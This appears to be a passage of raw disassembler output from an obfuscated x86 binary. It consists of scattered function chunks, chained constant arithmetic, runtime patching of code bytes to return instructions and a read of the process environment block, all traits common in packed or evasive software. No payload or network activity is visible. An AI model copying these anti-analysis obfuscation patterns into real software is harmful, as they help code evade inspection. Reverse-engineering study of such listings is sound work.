; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_44EB1B:				; CODE XREF: sub_44ED3C:loc_44A4EBj
		jz	loc_44C3D8
		jmp	loc_440916
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459FFC

loc_44EB26:				; CODE XREF: sub_459FFC-5954j
		mov	byte ptr [eax+edx], 0
		call	sub_441885
; END OF FUNCTION CHUNK	FOR sub_459FFC
; START	OF FUNCTION CHUNK FOR sub_4517D6

loc_44EB2F:				; CODE XREF: sub_4517D6-E70Fj
		jmp	sub_44367E
; END OF FUNCTION CHUNK	FOR sub_4517D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CE6

loc_44EB34:				; CODE XREF: sub_446CE6:loc_45B412j
		jz	loc_45658A
		jmp	loc_43C491
; END OF FUNCTION CHUNK	FOR sub_446CE6

; =============== S U B	R O U T	I N E =======================================



sub_44EB3F	proc near		; CODE XREF: k2vbe3.d:00449F1Dj
					; sub_45A21D+3A0p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044D8B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DBBF SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00454F17 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00455A9F SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	edx, [edx]
		push	edx
		push	edx
		jmp	loc_44D8B8
sub_44EB3F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAEB

loc_44EB4C:				; CODE XREF: sub_45AAEB-C4EDj
		jz	loc_453900
		jmp	loc_45C2C0
; END OF FUNCTION CHUNK	FOR sub_45AAEB
; ---------------------------------------------------------------------------

loc_44EB57:				; CODE XREF: k2vbe3.d:0045628Bj
		sbb	eax, ebp

; =============== S U B	R O U T	I N E =======================================



sub_44EB59	proc near		; CODE XREF: sub_4515E7+5p

; FUNCTION CHUNK AT 0043DBEA SIZE 0000000E BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	0AC89ECA8h
		pop	ebx
		or	ebx, 75FB7B6Ch
		add	ebx, 0C921ECC9h
		and	ebx, 0E6AEBE24h
		jmp	loc_43DBEA
sub_44EB59	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448380

loc_44EB7A:				; CODE XREF: sub_448380+13169j
		and	ebx, 73F0B9B8h
		xor	ebx, ds:4000E9h
		or	ebx, 0C434F3ABh
		add	ebx, 3B0FD8E5h
		xchg	ebx, [esp-4+arg_0]
		jmp	sub_443A95
; END OF FUNCTION CHUNK	FOR sub_448380
; ---------------------------------------------------------------------------
		push	esi
		jmp	sub_447E80
; ---------------------------------------------------------------------------

loc_44EBA0:				; CODE XREF: k2vbe3.d:loc_44DD9Bj
					; k2vbe3.d:0044EAB6j
		jge	loc_44FB1E
		sbb	edi, 0E3B3AA0Fh
		jmp	loc_44FB1A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_44EBB1:				; CODE XREF: sub_43DEBE:loc_451B03j
		or	edx, 9AB135BEh
		ror	ecx, 19h
		jmp	loc_440D02
; END OF FUNCTION CHUNK	FOR sub_43DEBE

; =============== S U B	R O U T	I N E =======================================



sub_44EBBF	proc near		; CODE XREF: k2vbe3.d:0044890Dj
					; sub_4423D2:loc_452B2Bp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00448C87 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004540E3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00455C1F SIZE 00000015 BYTES

		xchg	eax, [esp+0]
		pop	eax
		call	sub_4436CE
		mov	edx, 17B3C1CFh
		push	ecx
		push	984D2273h
		jmp	loc_455C1F
sub_44EBBF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1BD

loc_44EBD8:				; CODE XREF: sub_44C1BD:loc_45987Fj
		sub	edx, 6EDF2D3Ch
		or	edx, 1198731h
		test	edx, 4000000h
		jmp	loc_456655
; END OF FUNCTION CHUNK	FOR sub_44C1BD
; ---------------------------------------------------------------------------

loc_44EBEF:				; DATA XREF: sub_444BC3+5EA4o
		xor	eax, 23966D79h
		ror	eax, 4
		mov	edx, [esp]
; START	OF FUNCTION CHUNK FOR sub_458F54

loc_44EBFB:				; CODE XREF: sub_458F54+Cj
		push	eax
		mov	eax, edx
		push	esi
		jmp	loc_457053
; END OF FUNCTION CHUNK	FOR sub_458F54
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E827

loc_44EC04:				; CODE XREF: sub_44E827+10j
		call	sub_4553CC
		call	sub_45756B
; END OF FUNCTION CHUNK	FOR sub_44E827
; START	OF FUNCTION CHUNK FOR sub_444865

loc_44EC0E:				; CODE XREF: sub_444865+7j
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_444865
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_232. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_44EC14:				; CODE XREF: sub_44F028+5DD3j
		jmp	loc_4578D8
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_44EC19:				; CODE XREF: sub_44BDBB+3556j
		jmp	loc_4541FD
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F64

loc_44EC1E:				; CODE XREF: sub_442F64:loc_44B860j
		xchg	ecx, [esp+0]
		mov	ebp, ecx
		pop	ecx
		mov	eax, ds:dword_458BDC
		or	eax, eax
		jnz	loc_44E4C9
		jmp	loc_44BB16
; END OF FUNCTION CHUNK	FOR sub_442F64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4497D1

loc_44EC37:				; CODE XREF: sub_4497D1-3554j
		pushf
		push	offset loc_45334F
		jmp	nullsub_91
; END OF FUNCTION CHUNK	FOR sub_4497D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D419

loc_44EC42:				; CODE XREF: sub_44D419+Fj
		mov	byte ptr [eax],	0C3h
		jmp	loc_44E349
; END OF FUNCTION CHUNK	FOR sub_44D419

; =============== S U B	R O U T	I N E =======================================



sub_44EC4A	proc near		; CODE XREF: sub_41A84D+2Ep
					; k2vbe3.d:004431D0j
					; DATA XREF: ...

var_8		= dword	ptr -8
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043CE4E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004431C8 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004431E0 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00443B72 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450DBA SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00455F74 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004564C0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00457431 SIZE 0000000A BYTES

		push	ebx
		push	6A5159F9h
		pop	ebx
		and	ebx, 58D96A63h
		add	ebx, 0B7F2E96Fh
		jmp	loc_443B72
sub_44EC4A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_44EC62:				; CODE XREF: sub_4580DF-17D9Ej
		sub	ebx, 3A55E18Fh
		jmp	loc_455B48
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44EC6D:				; CODE XREF: sub_45A323:loc_442910j
		pop	edx
		and	edx, 0BB96AEA9h
		jnz	loc_45A588
		and	ebx, ecx
		test	edi, 95EC1268h
		jmp	loc_450B09
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_44EC87:				; CODE XREF: k2vbe3.d:0044A6E8j
		xor	eax, 0BF1C0AE4h
		call	sub_4553CC
		mov	ds:dword_41E068, eax
		lea	eax, nullsub_473
		mov	byte ptr [eax],	0C3h
		jmp	loc_44C95B

; =============== S U B	R O U T	I N E =======================================



sub_44ECA6	proc near		; CODE XREF: sub_40E632+234p
					; sub_4119EB+13p ...

; FUNCTION CHUNK AT 00456752 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00457E3D SIZE 00000005 BYTES

		call	sub_456767
		jmp	loc_457E3D
sub_44ECA6	endp

; ---------------------------------------------------------------------------

loc_44ECB0:				; CODE XREF: k2vbe3.d:00453391j
		pop	ecx
		sub	edx, 580B96B7h
		and	edx, 5D3820ACh
		or	edx, 2F32BECEh
		jns	loc_459A81
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_44ECC9:				; CODE XREF: sub_4424CF+106DAj
		jmp	loc_44D51B
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
		add	ebp, 0CDD7EF00h
		test	edx, ecx
		jmp	loc_459A7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444144

loc_44ECDB:				; CODE XREF: sub_444144+1F36j
					; sub_444144:loc_45919Dj
		and	ecx, 0F4FF6C0Ah
		rol	ecx, 0Fh
		add	ecx, 3E8D81h
		mov	[ecx], eax
		pop	ecx
		retn
; END OF FUNCTION CHUNK	FOR sub_444144
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_44ECEE:				; CODE XREF: sub_444EFA+5C37j
					; sub_43CCD0:loc_4556CCj
		jmp	loc_4469AF
; END OF FUNCTION CHUNK	FOR sub_43CCD0

; =============== S U B	R O U T	I N E =======================================



sub_44ECF3	proc near		; CODE XREF: sub_441EBE:loc_443215j

; FUNCTION CHUNK AT 004421BD SIZE 0000001D BYTES

		add	esp, 0FFFFFFE4h
		mov	[ebp-8], edx
		mov	[ebp-4], eax
		xor	eax, eax
		call	sub_442F31

loc_44ED03:				; CODE XREF: sub_441E39:loc_44B383j
		jmp	loc_4421BD
sub_44ECF3	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45325C

loc_44ED08:				; CODE XREF: sub_45325C:loc_453261j
		mov	eax, 0BEB860A6h
		call	sub_4553CC
		push	offset loc_455290
		jmp	nullsub_137
; END OF FUNCTION CHUNK	FOR sub_45325C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448B5E

loc_44ED1C:				; CODE XREF: sub_448B5E:loc_446694j
		jl	loc_44197B
		sbb	edi, ebx
		xchg	edx, edi
		jmp	loc_441973
; END OF FUNCTION CHUNK	FOR sub_448B5E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_238. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44ED2C	proc near		; CODE XREF: sub_41A5DC+3Bp
					; sub_44ED2C+5j
					; DATA XREF: ...
		call	sub_44ED3C
		jmp	ds:off_41E0D4
sub_44ED2C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_44ED37:				; CODE XREF: sub_4570C0-19B90j
					; k2vbe3.d:0045223Dj
		jmp	sub_453347
; END OF FUNCTION CHUNK	FOR sub_4570C0

; =============== S U B	R O U T	I N E =======================================



sub_44ED3C	proc near		; CODE XREF: sub_44364F:loc_44A447j
					; sub_44ED2Cp ...

; FUNCTION CHUNK AT 0043E2B4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043F07D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00440191 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440916 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442850 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443537 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00444BE5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004486CE SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044A4EB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AF97 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044BE99 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044C3D2 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044C97F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D28C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D521 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DD4E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EAD7 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044EB1B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F4A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450154 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00451148 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00451FBF SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00453648 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00454219 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045424B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045539D SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0045631A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004563EE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456AB4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004578F7 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00457B44 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004582C6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A713 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045C1A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C262 SIZE 0000000D BYTES

		call	sub_45AA63

loc_44ED41:				; CODE XREF: k2vbe3.d:loc_457C95j
		cmp	dword ptr [ebp-4], 0
		jz	loc_4486CE
		jmp	loc_44D28C
sub_44ED3C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F1

loc_44ED50:				; CODE XREF: sub_44D2F1+Fj
		jz	loc_44E614
		jmp	loc_4574DA
; END OF FUNCTION CHUNK	FOR sub_44D2F1
; ---------------------------------------------------------------------------

loc_44ED5B:				; DATA XREF: sub_4502BA-BEE7o
		add	eax, 0FF218DF2h
		push	edi
		pushf
		push	675F4070h
		jmp	loc_455846
; ---------------------------------------------------------------------------
		xor	edi, 0AF2B8E48h
		cmp	edx, ecx
		jmp	loc_43D856
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4568DA

loc_44ED7A:				; CODE XREF: sub_4568DA-9307j
		cmp	eax, ecx
		pop	ecx
		jnb	loc_44A38C
		jmp	loc_454AC5
; END OF FUNCTION CHUNK	FOR sub_4568DA
; ---------------------------------------------------------------------------

loc_44ED88:				; CODE XREF: k2vbe3.d:loc_448BCFj
		cmp	eax, 31096A1Bh
		jmp	loc_43D9D0
; ---------------------------------------------------------------------------
		adc	edx, 292C2E5Eh
		jmp	sub_458279
; ---------------------------------------------------------------------------
		shl	ebp, 6
		cmp	eax, 5BE7CF05h
		jmp	loc_43D459
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44EDAC:				; CODE XREF: sub_45A323:loc_4482B0j
		jnz	loc_44B45C
		jnb	loc_447522
		and	ebx, 0CF908303h
		test	ecx, ebx
; END OF FUNCTION CHUNK	FOR sub_45A323
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_44EDC0:				; CODE XREF: sub_4460FD:loc_4591D1j
		jmp	loc_44B456
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
		adc	esi, edi
		jmp	loc_441883
; ---------------------------------------------------------------------------

loc_44EDCC:				; CODE XREF: k2vbe3.d:0045502Fj
		ja	loc_43DF55
		push	0F7D3F60Eh
		jbe	loc_456A72
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_44EDDD:				; CODE XREF: sub_44B979:loc_45501Aj
		push	offset loc_458C67
		jmp	loc_458C00
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_44EDE7:				; CODE XREF: sub_44B94B+CEBBj
		push	offset loc_440B62
		jmp	loc_441ED6
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------

loc_44EDF1:				; CODE XREF: k2vbe3.d:0044336Bj
					; k2vbe3.d:loc_44EA2Bj	...
		add	eax, 0B05E93C5h
		popf
		xchg	eax, [esp]
		jmp	loc_4441F2
; ---------------------------------------------------------------------------

loc_44EE00:				; CODE XREF: k2vbe3.d:loc_441997j
		push	eax
		push	esi
		push	0AD825F1Ch
		pop	esi
		or	esi, 0C959218Fh
		rol	esi, 1Ch
		jmp	loc_451266
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_44EE16:				; CODE XREF: sub_44B912+Aj
		sub	ecx, 7DC08DE9h
		cmp	ecx, 5D79A73Bh
		jmp	loc_44191B
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44067C

loc_44EE27:				; CODE XREF: sub_44067C+19698j
		pop	edi
		js	sub_4515E7
		or	ebx, 2B969E43h

loc_44EE34:				; CODE XREF: sub_44067C:loc_459D09j
		add	edx, 0D84CC006h
		jmp	loc_44D9F8
; END OF FUNCTION CHUNK	FOR sub_44067C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4505F8

loc_44EE3F:				; CODE XREF: sub_4505F8-B785j
		jz	loc_44DF0C
		jmp	loc_43ECB7
; END OF FUNCTION CHUNK	FOR sub_4505F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44600A

loc_44EE4A:				; CODE XREF: sub_44600A+1318Ej
		jnz	loc_43F51F

loc_44EE50:				; CODE XREF: k2vbe3.d:00458FB0j
		jmp	sub_459AEA
; END OF FUNCTION CHUNK	FOR sub_44600A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44EE55:				; CODE XREF: sub_44C90E+377Aj
		jmp	loc_455195
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		and	eax, ecx
		jmp	loc_453AAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4524D2

loc_44EE61:				; CODE XREF: sub_4524D2+28F7j
		xor	edx, edx
		push	edx
; END OF FUNCTION CHUNK	FOR sub_4524D2
; START	OF FUNCTION CHUNK FOR sub_44CE6C

loc_44EE64:				; CODE XREF: sub_44CE6C:loc_44A0CDj
		push	eax
		mov	eax, [ebp-18h]
		call	sub_4447EC

loc_44EE6D:				; CODE XREF: k2vbe3.d:0045833Cj
		jmp	loc_443A58
; END OF FUNCTION CHUNK	FOR sub_44CE6C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FCA0

loc_44EE72:				; CODE XREF: sub_43FCA0+C791j
		jmp	loc_43D3F6
; END OF FUNCTION CHUNK	FOR sub_43FCA0
; ---------------------------------------------------------------------------

loc_44EE77:				; CODE XREF: k2vbe3.d:00451DFBj
		js	loc_449824
		sub	esi, 0C29A5959h
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44EE83:				; CODE XREF: sub_440C94:loc_451DE4j
		sub	esi, 4ACCF6BFh
		add	esi, 2EFE40DCh
		add	esi, ebp
		add	esi, 6F4947F4h
		mov	[esi], eax
		xchg	ecx, [esp+0]
		jmp	loc_444739
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_44EEA1:				; CODE XREF: sub_44B2D7:loc_45B761j
		ja	loc_441BE6
		xor	ebp, eax
		jmp	loc_4585E8
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
		push	0AAED00A6h
		pop	eax
		sub	eax, 0F0B39995h
		xor	eax, 0DA7FF744h
		add	eax, 6E247745h
		call	sub_4553CC
		jmp	loc_450FF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EB7

loc_44EED0:				; CODE XREF: sub_451EB7+930Bj
		xor	ecx, 0D77F0A83h
		add	ecx, 572C6742h
		and	ecx, 4CCB0F05h
		add	ecx, 0FB82B040h
		mov	[ecx], eax
		pop	ecx
		mov	eax, [ebp-0Ch]
		jmp	loc_4440B0
; END OF FUNCTION CHUNK	FOR sub_451EB7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_41976B

loc_44EEF3:				; CODE XREF: sub_41976B:loc_4401FAj
		jmp	ds:off_41E1FC
; END OF FUNCTION CHUNK	FOR sub_41976B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44EEF9:				; CODE XREF: sub_45A323-A36Aj
		jmp	nullsub_422
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_44EEFE	proc near		; CODE XREF: sub_41976B:loc_44C375p
					; k2vbe3.d:loc_44DC83j	...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044278B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044453D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449C92 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044B407 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044B71A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D98F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044EA8A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450963 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004514BD SIZE 0000001A BYTES

		xchg	ebx, [esp+0]
		mov	edx, ebx
		pop	ebx
		jmp	loc_44453D
sub_44EEFE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B6EC

loc_44EF09:				; CODE XREF: sub_44B6EC-E8Bj
		mov	edx, ebp
		pop	ebp
		add	eax, 0EBBCB042h
; END OF FUNCTION CHUNK	FOR sub_44B6EC
; START	OF FUNCTION CHUNK FOR sub_447594

loc_44EF12:				; CODE XREF: sub_447594+128E7j
		push	esi
		pushf
		jmp	loc_44BDEA
; END OF FUNCTION CHUNK	FOR sub_447594
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44680D

loc_44EF19:				; CODE XREF: sub_44680D-286Bj
		add	eax, edi
		pop	edi
		ror	eax, 15h
		sub	eax, 75D6730Ch
		call	sub_455A4F
		xchg	edi, [esi]
		jmp	sub_45B029
; END OF FUNCTION CHUNK	FOR sub_44680D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4432B0

loc_44EF31:				; CODE XREF: sub_4432B0:loc_4432B5j
		and	esi, 981487B5h
		rol	esi, 9
		add	esi, 0F49CFBDDh
		xor	esi, 0F71315AAh
		add	eax, esi
		pop	esi

loc_44EF49:				; CODE XREF: sub_43F77F+17C4Cj
		rol	eax, 1Ch
		jmp	loc_45861A
; END OF FUNCTION CHUNK	FOR sub_4432B0

; =============== S U B	R O U T	I N E =======================================



sub_44EF51	proc near		; DATA XREF: k2vbe3.d:004414B0o

; FUNCTION CHUNK AT 00449CFA SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044CAFF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451A51 SIZE 00000006 BYTES

		push	1C4D35A1h
		pop	edx
		rol	edx, 1Ah
		test	edx, 20h
		jmp	loc_451A51
sub_44EF51	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44EF65:				; CODE XREF: sub_440C94+1FB7j
		ja	loc_43F512

loc_44EF6B:				; CODE XREF: sub_440C94:loc_44E6F1j
		lea	edx, [ebp+var_14]
		mov	eax, (offset aSCFEE3fD+3)
		call	sub_45B74D
		push	0EA94B09h
		pop	eax
		xor	eax, 9F3A6E7Fh
		jmp	loc_459E9B
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_44EF89:				; CODE XREF: sub_44A79B+24B4j
		mov	ebp, esp
		push	ebx
		add	ebx, 0A8A977FAh
		jmp	loc_447CB3
; END OF FUNCTION CHUNK	FOR sub_44A79B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459371

loc_44EF97:				; CODE XREF: sub_459371+Aj
		mov	ebp, ebx
		call	sub_448D9B

loc_44EF9E:				; CODE XREF: sub_442475+17DA3j
		jmp	loc_454815
; END OF FUNCTION CHUNK	FOR sub_459371
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45156D

loc_44EFA3:				; CODE XREF: sub_45156D+Dj
		jmp	loc_45195B
; END OF FUNCTION CHUNK	FOR sub_45156D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B208

loc_44EFA8:				; CODE XREF: sub_44B208:loc_442875j
		mov	esp, ebp

loc_44EFAA:				; CODE XREF: k2vbe3.d:00443186j
		pop	ebp
		mov	eax, ds:dword_43FA64
		or	eax, eax
		jnz	loc_4536C0
		jmp	loc_457C50
; END OF FUNCTION CHUNK	FOR sub_44B208
; ---------------------------------------------------------------------------
		jmp	loc_440443
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FCA0

loc_44EFC3:				; CODE XREF: k2vbe3.d:0043DB41j
					; k2vbe3.d:0043EB83j ...
		jb	loc_453BC9
		mov	eax, large fs:30h
		push	ebx
		push	offset loc_45A478
		jmp	nullsub_478
; END OF FUNCTION CHUNK	FOR sub_43FCA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448AE2

loc_44EFDB:				; CODE XREF: sub_448AE2-5B45j
		or	edx, 19ED874Bh
		xor	eax, 59FC6844h

loc_44EFE7:				; CODE XREF: sub_448AE2:loc_448D44j
		lea	eax, [ebp-12Dh]
		push	eax
		call	sub_448D3A
		mov	[ebp-4], eax
; END OF FUNCTION CHUNK	FOR sub_448AE2
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_44EFF6:				; CODE XREF: sub_448AE2-862Ej
					; sub_4529E2:loc_44523Ej ...
		mov	eax, [ebp-24h]
		jmp	loc_453014
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D023

loc_44EFFE:				; CODE XREF: sub_43D023:loc_44B34Fj
		cdq
		and	ecx, 97C99F7Fh
		jmp	loc_451E9C
; END OF FUNCTION CHUNK	FOR sub_43D023
; ---------------------------------------------------------------------------
		xor	ebp, ebx
		jmp	loc_45795E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D9A7

loc_44F011:				; CODE XREF: sub_44D9A7+72BFj
		mov	[ecx], eax
		pop	ecx
		xor	eax, eax
		push	ebx
		push	0E258D8F3h
		jmp	loc_4423B3
; END OF FUNCTION CHUNK	FOR sub_44D9A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_44F021:				; CODE XREF: sub_4553CC-13214j
		not	ebx
		jmp	loc_4428CA
; END OF FUNCTION CHUNK	FOR sub_4553CC

; =============== S U B	R O U T	I N E =======================================



sub_44F028	proc near		; DATA XREF: sub_4479A1-649o

; FUNCTION CHUNK AT 0043D88D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043DA83 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043ECAC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FD8F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00440800 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00442491 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00443191 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00443677 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004440F5 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044506F SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00446E9C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004490D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EC14 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FA8C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00451F1D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454DF5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455EED SIZE 00000029 BYTES
; FUNCTION CHUNK AT 00456F36 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004578D8 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00458004 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A0DD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A77F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045B426 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C106 SIZE 0000001B BYTES

		test	eax, eax
		jle	loc_442491
		jmp	loc_446E9C
sub_44F028	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_44F035:				; CODE XREF: sub_4529E2-A49Ej
		xor	eax, 0F2D2C6CFh
		call	sub_4553CC
		mov	ds:off_41E0AC, eax
